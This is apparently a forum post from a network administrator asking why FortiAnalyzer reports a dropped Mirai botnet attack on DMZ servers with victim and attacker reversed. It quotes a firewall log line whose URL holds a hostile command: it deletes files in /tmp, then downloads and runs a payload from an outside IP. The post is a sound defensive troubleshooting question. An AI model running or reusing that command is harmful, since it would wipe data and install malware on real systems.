Illogical reports from FortiAnalyzer
From time to time our FortiGate is logging botnet activity. When I look at the lines in our syslog server the traffic is listed as incoming from external hosts into our servers in DMZ. The lines show attempts to install and execute a script in e.g. /tmp, and shortly after the same external host tries to contact the same DMZ server through port 80. The log lines might look something like this;
2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 time=21:52:04 devname="??????" devid="FGT2KETBXXXXXXXX" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" eventtime=1627933925055431525 tz="+0200" severity="high" srcip=126.96.36.199 srccountry="United States"dstip=10.10.91.89 srcintf="Ytre-aggr" srcintfrole="wan" dstintf="DMZ-1-2" dstintfrole="undefined" sessionid=2238099031 action="dropped" proto=6 service="HTTP" policyid=237 attack="Mirai.Botnet" srcport=37935 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 188.8.131.52/jaws;sh+/tmp/jaws" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=721445630 msg="backdoor: Mirai.Botnet," crscore=30 craction=8192 crlevel="high"
My interpretation of this is an attempt to infect our server – in other words we are the victim, and the external host is the attacker.
Our FortiGate is logging to a FortiAnalyzer at the same time as the syslog server, and after running the log through FortiAnalyzer this is reported the other way around. The external hosts are listed as “Victims” and our servers as “C&C”.
Why is FortiAnalyzer turning this around, and why is it written; direction="outgoing" in the log line ? Perhaps I have misunderstood the consept, and our servers are indeed infected ?
In addition to this all botnet activity is being dropped by the firewall so it really never reaches our DMZ server. Why is that not shown in the report ?